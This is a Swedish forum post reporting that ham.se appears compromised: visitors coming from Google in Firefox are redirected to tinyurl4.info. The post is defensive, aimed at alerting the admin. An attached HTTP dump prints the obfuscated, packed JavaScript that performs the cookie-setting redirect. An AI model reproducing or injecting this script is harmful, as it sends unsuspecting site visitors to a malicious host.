Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf
Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.
Söker man på tinyurl4.info får man upp andra som haft liknande problem med smittade forum. Det verkar som "viruset" visar sig eller ej beroende bland annat på referer.
Stänger man av javascript i firefox kommer man istället till en vit sida. Tittar man på källkoden så ser man samma script som finns nedan.
Kanske något för Admin att undersöka närmare.
Bifogar en nätverksdump på request och svar.
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf
Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.
Söker man på tinyurl4.info får man upp andra som haft liknande problem med smittade forum. Det verkar som "viruset" visar sig eller ej beroende bland annat på referer.
Stänger man av javascript i firefox kommer man istället till en vit sida. Tittar man på källkoden så ser man samma script som finns nedan.
Kanske något för Admin att undersöka närmare.
Bifogar en nätverksdump på request och svar.
Code:
GET / HTTP/1.1
Host: [url]www.ham.se[/url]
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: sv-se,sv;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: [url]http://www.google.se/url?sa=t&rct=j&q=site%3Aham.se&source=web&cd=1&ved=0CDIQFjAA&url=http%3A%2F%2Fwww.ham.se%2F&ei=ZPFET4_aNsSM4gTQs6G8Aw&usg=AFQjCNG9zaD2H0vfGXXl5huxtGvCM8I8XQ[/url]
HTTP/1.1 200 OK
Date: Wed, 22 Feb 2012 13:45:33 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.15 mod_ssl/2.2.17 OpenSSL/0.9.7l DAV/2 mod_scgi_pubsub/1.11-pubsub
X-Powered-By: PHP/5.2.15
Set-Cookie: bbsessionhash=082a039b4d99a966595dec4a70ece131; path=/; domain=.ham.se; HttpOnly
Set-Cookie: bblastvisit=1329918333; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se
Set-Cookie: bblastactivity=0; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
MS-Author-Via: DAV
Content-Length: 1099
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
var ipbs='43e20abf';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m a=["\\A\\d\\b\\l\\c\\z\\d","\\j\\d\\b\\l\\c\\z\\d","\\w\\q\\d\\C\\g\\c\\n\\d\\j\\k","\\b\\e\\D\\B\\l\\J\\b\\n\\c\\i\\A","\\o\\e\\e\\G\\c\\d","\\k","\\w\\q\\g\\v\\b\\u\\k\\f","\\c\\g\\H\\j","\\E","\\r\\e\\o\\v\\b\\c\\e\\i","\\u\\b\\b\\g\\I\\f\\f\\b\\c\\i\\K\\R\\n\\r\\S\\T\\c\\i\\P\\e\\f"];M x(p,y){m h=N O();h[a[1]](h[a[0]]()+L);m s=a[2]+h[a[3]]();t[a[4]]=p+a[5]+y+s+a[6]};x(a[7],a[8]);t[a[9]]=a[F]+Q;',56,56,'||||||||||_0x19e6|x74|x69|x65|x6F|x2F|x70|_0x46a7x4|x6E|x73|x3D|x54|var|x72|x63|_0x46a7x2|x20|x6C|_0x46a7x5|document|x68|x61|x3B|ipbcc|_0x46a7x3|x6D|x67|x4D|x78|x47|x31|10|x6B|x62|x3A|x53|x79|86400000|function|new|Date|x66|ipbs|x75|x34|x2E'.split('|'),0,{}))</script>
Last edited: